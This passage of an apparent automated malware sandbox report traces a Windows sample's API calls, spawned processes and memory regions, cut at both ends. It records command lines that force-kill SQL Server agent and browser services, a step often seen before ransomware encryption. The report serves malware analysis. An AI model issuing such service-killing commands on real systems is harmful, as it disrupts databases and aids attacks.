_wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0144.967] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0144.967] GetProcessHeap () returned 0x5b0000 [0144.968] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b7588) returned 1 [0144.968] GetProcessHeap () returned 0x5b0000 [0144.968] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bb110 [0144.968] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0144.971] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqlagent.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqlagent.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqlagent.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xf5c, dwThreadId=0xf60)) returned 1 [0144.996] CloseHandle (hObject=0x98) returned 1 [0144.996] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.996] GetProcessHeap () returned 0x5b0000 [0144.997] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b9d50) returned 1 [0144.997] GetEnvironmentStringsW () returned 0x5b9d50* [0144.997] GetProcessHeap () returned 0x5b0000 [0144.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa76) returned 0x5b7cc0 [0144.998] FreeEnvironmentStringsA (penv="=") returned 1 [0144.998] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0146.291] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0146.292] CloseHandle (hObject=0x9c) returned 1 [0146.292] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0146.293] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0146.293] GetProcessHeap () returned 0x5b0000 [0146.297] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b7cc0) returned 1 [0146.298] GetEnvironmentStringsW () returned 0x5bb160* [0146.298] GetProcessHeap () returned 0x5b0000 [0146.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa9c) returned 0x5b7cc0 [0146.298] FreeEnvironmentStringsA (penv="=") returned 1 [0146.298] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.298] GetProcessHeap () returned 0x5b0000 [0146.299] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b7cc0) returned 1 [0146.301] GetEnvironmentStringsW () returned 0x5bb160* [0146.301] GetProcessHeap () returned 0x5b0000 [0146.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa9c) returned 0x5b7cc0 [0146.301] FreeEnvironmentStringsA (penv="=") returned 1 [0146.301] GetProcessHeap () returned 0x5b0000 [0146.301] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bb110) returned 1 [0146.301] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0146.302] _get_osfhandle (_FileHandle=1) returned 0x154 [0146.302] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0146.302] _get_osfhandle (_FileHandle=1) returned 0x154 [0146.302] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0146.302] _get_osfhandle (_FileHandle=0) returned 0x144 [0146.302] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0146.302] GetConsoleOutputCP () returned 0x1b5 [0146.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0146.311] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.323] exit (_Code=128) Thread: id = 126 os_tid = 0xeb8 Process: id = "11" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x57944000" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x3a0" cmd_line = "taskkill /f /im sqlagent.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1301 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1302 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1303 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1304 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1305 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1306 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1307 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1308 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1309 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1310 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1311 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1312 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1314 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1315 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1316 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1317 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1318 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1319 start_va = 0x4570000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 1320 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1321 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1322 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1323 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1324 start_va = 0x4580000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 1325 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1326 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1327 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1328 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1329 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1330 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1331 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1332 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1333 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1334 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 1335 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1336 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1337 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1338 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1339 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1340 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1341 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1342 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1343 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1344 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1345 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1346 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1347 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1348 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1349 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1350 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1351 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1352 start_va = 0x4770000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 1353 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1354 start_va = 0x4880000 end_va = 0x4a07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 1355 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1356 start_va = 0x4a10000 end_va = 0x4b90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 1357 start_va = 0x4ba0000 end_va = 0x5f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 1358 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1359 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 1360 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1361 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 1362 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 1363 start_va = 0x5fa0000 end_va = 0x62d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1364 start_va = 0x4580000 end_va = 0x4669fff monitored = 0 entry_point = 0x45bd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1365 start_va = 0x4670000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1366 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 1367 start_va = 0x4580000 end_va = 0x465ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1368 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1369 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 1370 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1371 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 1372 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1373 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1374 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1375 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1376 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 1377 start_va = 0x4520000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1378 start_va = 0x4770000 end_va = 0x47affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 1379 start_va = 0x47b0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 1380 start_va = 0x47f0000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 1381 start_va = 0x4830000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 1382 start_va = 0x4870000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 1383 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1384 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1385 start_va = 0x4560000 end_va = 0x4565fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004560000" filename = "" Thread: id = 127 os_tid = 0xf60 Thread: id = 128 os_tid = 0x654 Thread: id = 129 os_tid = 0xe68 Thread: id = 130 os_tid = 0xf54 Thread: id = 131 os_tid = 0xc78 Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x51500000" os_pid = "0x5e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqlbrowser.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1386 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1387 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1388 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1389 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1390 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1391 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1392 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1393 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1394 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1395 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1396 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1397 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1398 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1399 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1400 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1401 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1402 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1403 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1404 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1405 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1406 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1407 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1408 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1409 start_va = 0x400000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1410 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 